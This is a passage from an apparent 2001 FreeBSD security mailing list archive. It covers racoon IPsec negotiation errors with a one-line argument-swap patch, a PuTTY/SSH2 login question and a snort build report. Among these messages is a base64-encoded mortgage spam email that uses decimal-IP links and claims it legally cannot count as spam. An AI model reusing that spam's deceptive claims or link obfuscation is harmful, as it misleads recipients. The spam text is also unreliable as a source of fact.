isakmp_quick.c:1025:quick_r1recv(): failed > to get proposal for responder. > 2001-09-06 08:52:21: ERROR: isakmp.c:975:isakmp_ph2begin_r(): failed to > pre-process packet. > 2001-09-06 08:52:32: INFO: isakmp.c:1618:isakmp_post_acquire(): request > for establishing IPsec-SA was queued due to no phase1 found. > 2001-09-06 08:52:32: ERROR: isakmp.c:1676:isakmp_chkph1there(): phase1 > negotiation failed due to time up. > 2001-09-06 08:52:32: INFO: isakmp.c:1678:isakmp_chkph1there(): delete > phase 2 handler. > > Help please! > > -- > ---------------------------------------------------------------------------- > --- > Eric Anderson anderson@centtech.com Centaur Technology (512) > 418-5792 > Truth is more marvelous than mystery. > ---------------------------------------------------------------------------- > --- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --------------63E07C416784556870518E97 Content-Type: text/plain; charset=us-ascii; name="isakmp_quick.c.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="isakmp_quick.c.patch" --- isakmp_quick.c.orig Fri Oct 26 15:51:14 2001 +++ isakmp_quick.c Fri Oct 26 15:51:30 2001 @@ -2017,7 +2017,7 @@ } /* set new proposal derived from a policy into the iph2->proposal. */ - if (set_proposal_from_policy(iph2, sp_in, sp_out) < 0) { + if (set_proposal_from_policy(iph2, sp_out, sp_in) < 0) { plog(LLV_ERROR, LOCATION, NULL, "failed to create saprop.\n"); return ISAKMP_INTERNAL_ERROR; --------------63E07C416784556870518E97-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 23: 6:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp3.mx.pitdc1.stargate.net (smtp3.mx.pitdc1.stargate.net [206.210.69.143]) by hub.freebsd.org (Postfix) with SMTP id E48E437B403 for ; Fri, 26 Oct 2001 23:06:34 -0700 (PDT) Received: (qmail 2746 invoked from network); 27 Oct 2001 06:06:27 -0000 Received: from unknown (HELO localhost) (63.48.180.58) by smtp3.mx.pitdc1.stargate.net with SMTP; 27 Oct 2001 06:06:27 -0000 X-Sender: kanderson@stargate.net From: Kevin Anderson To: "Mortgage Borrower" Date: Fri, 26 Oct 2001 23:16:42 -0700 Subject: Need a Home Loan? Let Us Help! Reply-To: kanderson@stargate.net MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001__323262915_83802.79" Message-Id: <20011027060634.E48E437B403@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a Multipart MIME message. ------=_NextPart_000_001__323262915_83802.79 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit ------=_NextPart_000_001__323262915_83802.79 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: base64 DQoNCjxIVE1MPg0KDQo8aGVhZD4NCjxNRVRBIEhUVFAtRVFVSVY9IkNvbnRlbnQtVHlwZSIg Q09OVEVOVD0idGV4dC9odG1sO2NoYXJzZXQ9aXNvLTg4NTktMSI+DQo8IURPQ1RZUEUgSFRN TCBQVUJMSUMgIi0vL1czQy8vRFREIEhUTUwgNC4wIFRyYW5zaXRpb25hbC8vRU4iPg0KPFRJ VExFPkZyZWUgUmF0ZSBRdW90ZTwvVElUTEU+DQo8TUVUQSBjb250ZW50PSJ0ZXh0L2h0bWw7 IGNoYXJzZXQ9aXNvLTg4NTktMSIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+PFhNRVRBIA0K Y29udGVudD0iTW96aWxsYS80LjcgW2VuXSAoV2luOTg7IEkpIFtOZXRzY2FwZV0iIG5hbWU9 IkdFTkVSQVRPUiI+DQo8TUVUQSBjb250ZW50PSJNaWNyb3NvZnQgRnJvbnRQYWdlIDQuMCIg bmFtZT1HRU5FUkFUT1I+DQo8U1RZTEU+PC9TVFlMRT4NCjwvSEVBRD4NCjxCT0RZIGJhY2tn cm91bmQ9aHR0cDovLzM2MzExMzM0NjIvbW9uZXlfZ3IuanBnIGJnQ29sb3I9I2ZmZmZmZiBi Z3Byb3BlcnRpZXM9ImZpeGVkIj4NCjxESVYgc3R5bGU9IkZPTlQ6IDEwcHQgYXJpYWwiPg0K PERJVj4mbmJzcDs8L0RJVj48L0RJVj4NCjxESVY+PEJSPjwvRElWPg0KPEJSPg0KPFAgYWxp Z249Y2VudGVyPjxiPjxpPjxmb250IGNvbG9yPSIjMDAwMGZmIiBmYWNlPSJCcnVzaCBTY3Jp cHQgTVQiIHNpemU9IjUiPiZxdW90O0FsbCBvdXIgdGhvdWdodHMsIHByYXllcnMgYW5kIGxv dmUgZ28gb3V0IHRvIHRoZSBmYW1pbGllcyBhbmQgZnJpZW5kcyBvZiB0aGUgdmljdGltcyBv ZiB0aGUgV29ybGQgVHJhZGUgQ2VudGVyIHRyYWdlZHkuJnF1b3Q7PC9mb250PjwvaT48L2I+ PC9QPg0KDQo8UCBhbGlnbj1jZW50ZXI+PGVtPjxiPjxmb250IGNvbG9yPSIjZmYwMDAwIiBz aXplPSI2IiBmYWNlPSJhcmlhbCI+JnF1b3Q7UmVmaW5hbmNlIFlvdXINCkN1cnJlbnQgTW9y dGdhZ2UgV2hpbGUgUmF0ZXMgQXJlIExPVyEhJnF1b3Q7PC9mb250PjwvYj48L2VtPjwvUD4N CjxNQVJRVUVFPjxpPjxiPjxGT05UIHNpemU9NCBjb2xvcj0jMDAwMGZmPkhPTUUgRVFVSVRZ IExPQU5TICoqKiBKVU1CTyBMT0FOUyAqKiogSE9NRSBJTVBST1ZFTUVOVCBMT0FOUyAqKiog DQogICAgICBERUJUIENPTlNPTElEQVRJT04gTE9BTlMgKioqIFJFRklOQU5DRSBMT0FOUyAq KiogQUxMIEFSRSBBVkFJTEFCTEUgVE8gWU9VICoqKiBSQVRFUyBBUyBMT1cgQVMgDQogICAg ICAzLjk1JTwvZm9udD48L2I+PC9pPjwvbWFycXVlZT4NCjxCUj48QlI+DQo8cCBhbGlnbj0i Y2VudGVyIj48Yj48Zm9udCBzaXplPSI0Ij5Nb3J0Z2FnZSBSYXRlcyBBcmUgU28gTG93ISZu YnNwOzwvZm9udD48L2I+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGI+PGZvbnQgc2l6ZT0i NCI+WW91IENhbiBTYXZlIFRob3VzYW5kcyBPZiBEb2xsYXJzIEJ5IFRha2luZw0KQWR2YW50 YWdlIE5vdyE8L2ZvbnQ+PC9iPjwvcD4NCjxQIGFsaWduPWNlbnRlcj48RU0+PEI+PEZPTlQg Y29sb3I9I2ZmMDAwMCBzaXplPTU+JnF1b3Q7V0UgQVJFIEFOIEFTU09DSUFUSU9OIE9GDQpN T1JUR0FHRSBCUk9LRVJTIEFORCBMRU5ERVJTIDwvRk9OVD48L0I+PC9FTT48L1A+DQo8UCBh bGlnbj1jZW50ZXI+PEVNPjxCPjxGT05UIGNvbG9yPSNmZjAwMDAgc2l6ZT01PldJVEggVEhF IEJFU1QgUkFURVMgQU5EIFRIRSBMT1dFU1QNCkNPU1RTISZxdW90PC9GT05UPjwvQj48L0VN PjwvUD4NCjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4NCjxQIGFsaWduPWNlbnRlcj48 Rk9OVCBjb2xvcj0jMDAwMGZmIHNpemU9ND48Qj5XZSZuYnNwO2hhdmUgdGhvdXNhbmRzIG9m IGxvYW4gDQpwcm9ncmFtcyB0aHJvdWdoIGh1bmRyZWRzIG9mIGxlbmRlcnMhPEJSPjwvQj48 L0ZPTlQ+PEZPTlQgc2l6ZT0zPjwvRk9OVD48L1A+DQo8UCBhbGlnbj1jZW50ZXI+PFNUUk9O Rz48Rk9OVCBzaXplPTU+WW91IGNhbiBjaG9vc2UgZnJvbSZuYnNwOyJBZGp1c3RhYmxlIFJh dGUNCk1vcnRnYWdlcyANCmFzIGxvdyBhcyAzLjk1JSZxdW90OzwvRk9OVD48L1NUUk9ORz48 L1A+DQo8UCBhbGlnbj1jZW50ZXI+PFNUUk9ORz48Rk9OVCBzaXplPTU+YW5kJm5ic3A7IkZp eGVkIFJhdGUgTW9ydGdhZ2VzIGFzIGxvdyBhcw0KNS41MCUmbmJzcDs8L0ZPTlQ+PC9TVFJP Tkc+PC9QPg0KPFAgYWxpZ249Y2VudGVyPjxTVFJPTkc+PEZPTlQgc2l6ZT01PmFsbCB3aXRo IHRoZSBsb3dlc3QgY29zdHMgaW4gdGhlDQpOYXRpb24hJnF1b3Q7PC9GT05UPjwvU1RST05H PjxCSUc+PEJJRz48Rk9OVCBjb2xvcj0jZmYwMDAwPio8L0ZPTlQ+PC9CSUc+PC9CSUc+PC9Q Pg0KPFAgYWxpZ249Y2VudGVyPjxGT05UIA0Kc2l6ZT01Pjxmb250IGNvbG9yPSIjRkYwMDAw Ij4mcXVvdDs8Yj48aT5ZT1UgQ0FOIDx1PkJVWSBET1dOIFlPVVIgSU5URVJFU1QgUkFURTwv dT4NClRPPC9pPjwvYj48L2ZvbnQ+PC9GT05UPjwvUD4NCjxQIGFsaWduPWNlbnRlcj48Zm9u dCBjb2xvcj0iI0ZGMDAwMCIgc2l6ZT0iNSI+PGI+PGk+QVMgTE9XIEFTIFlPVSBDQU4NCkFG Rk9SRCEmcXVvdDs8L2k+PC9iPjwvZm9udD48Rk9OVCANCnNpemU9NT48QlI+PC9GT05UPjxG T05UIHNpemU9Mz48L0ZPTlQ+PC9QPg0KPFAgYWxpZ249Y2VudGVyPjxGT05UIHNpemU9KzA+ PEZPTlQgY29sb3I9IzAwMDBmZiBzaXplPTI+PEJJRz48QklHPjxGT05UIA0KY29sb3I9I2Zm MDAwMCBzaXplPTU+KjwvRk9OVD48L0JJRz48U1RST05HPkFsbCByYXRlcyBhcmUgYmFzZWQg b24gDQpxdWFsaWZpY2F0aW9uPC9TVFJPTkc+ITwvQklHPjwvRk9OVD48L0ZPTlQ+PC9QPg0K PFAgYWxpZ249Y2VudGVyPjxGT05UIHNpemU9KzA+PEZPTlQgc2l6ZT0yPjxCSUc+PC9CSUc+ PC9GT05UPjxGT05UIA0KY29sb3I9IzAwMDBmZj48Rk9OVCBmYWNlPUFyaWFsPjxGT05UIHNp emU9Mj48QSBocmVmPSJodHRwOi8vMzYzMTEzMzQ2MiIgDQp0YXJnZXQ9X2JsYW5rPjxGT05U IHNpemU9NT48U1RST05HPjxGT05UIGZhY2U9IlRpbWVzIE5ldyBSb21hbiI+Q2xpY2sgaGVy ZSBmb3IgDQp5b3VyIDwvRk9OVD48Rk9OVCBzaXplPTY+PEZPTlQgZmFjZT0iVGltZXMgTmV3 IFJvbWFuIj48RU0+IkZSRUUgUkFURSANClFVT1RFIiE8L0VNPjwvRk9OVD48L0ZPTlQ+PC9T VFJPTkc+PC9GT05UPjwvQT48L0ZPTlQ+PC9GT05UPjwvRk9OVD48L0ZPTlQ+PC9QPg0KPFAg YWxpZ249bGVmdD4mbmJzcDs8L1A+DQo8UCBhbGlnbj1sZWZ0PjxpPjxiPjxmb250IGZhY2U9 IkFyaWFsIiBzaXplPSIrMCI+Q0xJQ0sgT04gTE9BTlMgQkVMT1cgRk9SIFlPVVINCkZSRUUg QVBQTElDQVRJT04hPC9mb250PjwvYj48L2k+PEZPTlQgZmFjZT1BcmlhbD48QlI+PC9GT05U PjwvUD4NCjxQIGFsaWduPWxlZnQ+PFNUUk9ORz48RU0+PEEgaHJlZj0iaHR0cDovLzM2MzEx MzM0NjIiIA0KdGFyZ2V0PV9ibGFuaz48Zm9udCBzaXplPSI1IiBjb2xvcj0iIzgwMDA4MCI+ UHVyY2hhc2UgTG9hbnM8L2ZvbnQ+PC9BPiA8Rk9OVCBzaXplPTU+DQo8L0ZPTlQ+IDwvRU0+ PEZPTlQgDQpzaXplPTQ+LSA8RU0+VGhvdXNhbmRzIG9mIHByb2dyYW1zIA0KZm9yIEZpcnN0 IE1vcnRnYWdlcyE8L0VNPjwvRk9OVD48ST48L0k+PC9TVFJPTkc+PEk+PEZPTlQgDQpjb2xv cj0jMDAwMDAwPjxCUj48QlI+PC9GT05UPjwvST48QSBocmVmPSJodHRwOi8vMzYzMTEzMzQ2 MiIgX2JsYW5rPz48RU0+PFNUUk9ORz48Zm9udCBzaXplPSI1IiBjb2xvcj0iIzgwMDA4MCI+ UmVmaW5hbmNlIExvYW5zPC9mb250PjwvU1RST05HPjwvRU0+PEk+PEZPTlQgDQpjb2xvcj0j MDAwMDAwIHNpemU9Mj4gPC9GT05UPjwvST48L0E+PEk+PEZPTlQgY29sb3I9IzAwMDAwMCBz aXplPTQ+LSA8Qj5SZWR1Y2UgeW91ciANCm1vbnRobHkgcGF5bWVudHMgYW5kPC9GT05UPjxG T05UIGNvbG9yPSMwMDAwMDAgc2l6ZT0yPiA8L0ZPTlQ+PEZPTlQgDQpjb2xvcj0jZmYwMDAw IHNpemU9NT5HZXQgQ2FzaCBCYWNrITwvRk9OVD48L0I+PEZPTlQgY29sb3I9IzAwMDAwMCBz aXplPTQ+IA0KPC9GT05UPjxGT05UIGNvbG9yPSMwMDAwMDAgc2l6ZT0zPjxCUj48QlI+PC9G T05UPjwvST48QSANCmhyZWY9Imh0dHA6Ly8zNjMxMTMzNDYyIiB0YXJnZXQ9X2JsYW5rPjxm b250IGNvbG9yPSIjODAwMDgwIj48RU0+PEI+PEZPTlQgc2l6ZT01PlNlY29uZCANCk1vcnRn YWdlczwvRk9OVD48L0I+PC9FTT48ST48Rk9OVCBzaXplPTM+IDwvRk9OVD48L0k+DQo8L2Zv bnQ+IDwvQT48ST48Rk9OVCBjb2xvcj0jMDAwMDAwIHNpemU9Mz4gLSA8L0ZPTlQ+PEI+PEZP TlQgDQpjb2xvcj0jMDAwMDAwIHNpemU9ND5XZSBjYW4gaGVscCB5b3UgZ2V0IGZyb20gPC9G T05UPjxGT05UIGNvbG9yPSNmZjAwMDAgDQpzaXplPTU+OTAlPC9GT05UPjxGT05UIGNvbG9y PSMwMDAwMDAgc2l6ZT00PiB1cCB0byA8L0ZPTlQ+PEZPTlQgY29sb3I9I2ZmMDAwMCANCnNp emU9NT4xMjUlPC9GT05UPjxGT05UIGNvbG9yPSMwMDAwMDAgc2l6ZT00PiBvZiB5b3VyIGhv bWVzIHZhbHVlISAocmF0aW9zIHZhcnkgDQpieSBzdGF0ZSk8L0ZPTlQ+PC9CPjwvUD4NCjxQ IGFsaWduPWxlZnQ+PEEgaHJlZj0iaHR0cDovLzM2MzExMzM0NjIiIA0KdGFyZ2V0PV9ibGFu az48Qj48Zm9udCBzaXplPSI1IiBjb2xvcj0iIzgwMDA4MCI+RGVidCBDb25zb2xpZGF0aW9u PC9mb250PjwvQj48L0E+PEZPTlQgY29sb3I9IzAwMDAwMCBzaXplPTM+IDxGT05UIGNvbG9y PSMwMDAwMDAgc2l6ZT00Pi0gDQo8Qj5Db21iaW5lIDwvRk9OVD48Rk9OVCBjb2xvcj0jZmYw MDAwIHNpemU9NT5hbGw8L0ZPTlQ+PEZPTlQgY29sb3I9IzAwMDAwMCANCnNpemU9ND4geW91 ciBiaWxscyBpbnRvIDwvRk9OVD48Rk9OVCBjb2xvcj0jZmYwMDAwIHNpemU9NT5PbmUgTG93 IE1vbnRobHkgDQpQYXltZW50ITwvRk9OVD48L0I+PEJSPjxCUj48L0ZPTlQ+PEI+PEEgDQpo cmVmPSJodHRwOi8vMzYzMTEzMzQ2MiIgdGFyZ2V0PV9ibGFuaz48Zm9udCBzaXplPSI1IiBj b2xvcj0iIzgwMDA4MCI+Rmlyc3QgVGltZSBIb21lIEJ1eWVyczwvZm9udD48L0E+PEZPTlQg Y29sb3I9IzAwMDAwMCBzaXplPTM+IC0gDQo8Rk9OVCBjb2xvcj0jMDAwMDAwIHNpemU9ND5X ZSBjYW4gaGVscCB5b3UgYnV5IHdpdGggPEZPTlQgY29sb3I9I2ZmMDAwMCANCnNpemU9NT5M b3c8L0ZPTlQ+PC9GT05UPjxGT05UIGNvbG9yPSNmZjAwMDAgc2l6ZT01PiBNb25leSBEb3du PC9GT05UPjxGT05UIA0KY29sb3I9IzAwMDAwMCBzaXplPTQ+LCBhbmQgZXZlbiA8L0ZPTlQ+ PEZPTlQgY29sb3I9I2ZmMDAwMCBzaXplPTU+R2V0IENhc2ggDQpCYWNrITwvRk9OVD48L0ZP TlQ+PC9CPjwvUD48L0k+DQo8UCBhbGlnbj1jZW50ZXI+PEJJRz48QklHPjxGT05UIGNvbG9y PSNmZjAwMDA+KjwvRk9OVD48L0JJRz5BbGwgcmF0ZXMgYXJlIGJhc2VkIA0Kb24gcXVhbGlm aWNhdGlvbiE8L0JJRz48L1A+DQo8UCBhbGlnbj1jZW50ZXI+PEI+PEk+PEZPTlQgY29sb3I9 IzAwMDAwMCBzaXplPTY+V2UgaGF2ZSBwcm9ncmFtcyBmb3IgDQo8L0ZPTlQ+PEZPTlQgY29s b3I9I2ZmMDAwMCBzaXplPTY+PFU+RVZFUlk8L1U+PC9GT05UPjxGT05UIGNvbG9yPSMwMDAw MDAgc2l6ZT02PiANCmNyZWRpdCBzaXR1YXRpb24hPC9GT05UPjxCUj48QlI+PEEgaHJlZj0i aHR0cDovLzM2MzExMzM0NjIiIHRhcmdldD1fYmxhbms+PEZPTlQgDQpjb2xvcj0jMDAwMGZm IHNpemU9NT5DbGljayBoZXJlIGZvciB5b3VyIEZSRUUgUkFURSBRVU9URSE8L0ZPTlQ+PC9B PjwvST48L0I+PC9QPg0KPFAgYWxpZ249bGVmdD48Rk9OVCBjb2xvcj0jMDA4MDAwPjxTVFJP Tkc+JnF1b3Q7VGhpcyBtZXNzYWdlIGlzIGJlaW5nIHNlbnQgdG8NCnlvdSBpbiBjb21wbGlh bmNlIHdpdGgmbmJzcDtCaWxsIFMuIDE2MTggVGl0bGUgSUlJIHBhc3NlZCBieSB0aGUgMTA1 dGggVVMNCkNvbmdyZXNzLCB3aGljaCBzdGF0ZXMgdGhhdCB0aGlzIGxldHRlciBjYW4gbm90 IGJlIGNvbnNpZGVyZWQgc3BhbSBhcyBsb25nIGFzIHdlDQppbmNsdWRlICgxKSBWYWxpZCBD b250YWN0IEluZm9ybWF0aW9uIGFuZCAoMikmbmJzcDthIHdheSB0byBiZSByZW1vdmVkIGZy b20gYW55DQpmdXJ0aGVyIHRyYW5zbWlzc2lvbnMgYXQgbm8gY29zdCB0byB5b3UgYnkgc3Vi bWl0dGluZyBhIHJlcXVlc3QgdG8gYmUNCnJlbW92ZWQuJnF1b3Q7IC4gPGEgaHJlZj0iaHR0 cDovLzM2MzExMzM0NjIvcmVtb3ZlLmh0bSI+Q2xpY2sgSGVyZSB0byBTZW5kIGEgUmVtb3Zl IFJlcXVlc3Q8L2E+Lg0KJnF1b3Q7V2UgaG9ub3IgYWxsIHJlbW92ZSBlbWFpbCBhZGRyZXNz IHJlcXVlc3RzJm5ic3A7aW1tZWRpYXRlbHkuJnF1b3Q7PC9TVFJPTkc+PC9GT05UPjwvUD48 L0JPRFk+PC9IVE1MPg== ------=_NextPart_000_001__323262915_83802.79-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 27 2:32: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 680DA37B401 for ; Sat, 27 Oct 2001 02:32:00 -0700 (PDT) Received: (qmail 42263 invoked from network); 27 Oct 2001 09:31:58 -0000 Received: from pec-69-112.tnt4.m2.uunet.de (HELO laptop) (149.225.69.112) by relay1.pair.com with SMTP; 27 Oct 2001 09:31:58 -0000 X-pair-Authenticated: 149.225.69.112 Message-ID: <005501c15eca$4a47aaa0$0901a8c0@system> From: "Tom Beer" To: Cc: References: <006801c15dee$471d80c0$0901a8c0@system> <3BD99429.FEC70F35@quadtelecom.com> Subject: Re: Putty & SSH Date: Sat, 27 Oct 2001 11:30:49 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, first thanks for all the considerations! > > Is putty configured to provide the your logon name, and the identity > file's location. Yes. I provide the logon name and the BSD generated logon key, but every time authentication fails, claiming that there is no other login operation permitted, what is intended. So I try to find another SSH Client, which will give me SSH2 support. I'll try starting with Cygwin. Thanks a lot Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 27 8:25:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from ct980320-b.blmngtn1.in.home.com (ct980320-b.blmngtn1.in.home.com [65.8.207.32]) by hub.freebsd.org (Postfix) with ESMTP id 44B4337B40D for ; Sat, 27 Oct 2001 08:25:08 -0700 (PDT) Received: (from mikes@localhost) by ct980320-b.blmngtn1.in.home.com (8.11.6/8.11.4) id f9RFP2B22855; Sat, 27 Oct 2001 10:25:02 -0500 (EST) (envelope-from mikes) From: Mike Squires Message-Id: <200110271525.f9RFP2B22855@ct980320-b.blmngtn1.in.home.com> Subject: FreeBSD-4.4 STABLE + snort 1.8.2 beta (10/26) Build 85 OK To: snort-devel@lists.sourceforge.net Date: Sat, 27 Oct 2001 10:25:02 -0500 (EST) Cc: Snort Users , freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL88 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I installed 1.8.2 beta (Build 85) with associated rules files (also downloaded 10/26) on a PII/300 running FreeBSD 4.4-STABLE (recompiled 10/12) and snort has been running for 24 hours, no problems. I used the standard FreeBSD configure options (no MySQL, no OBDC, no PostGresQL) 1.8.1-RELEASE crashes (segementation error) in from 10 minutes to a day or so, depending on which rules file or set of rules files I use. Mike Squires To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message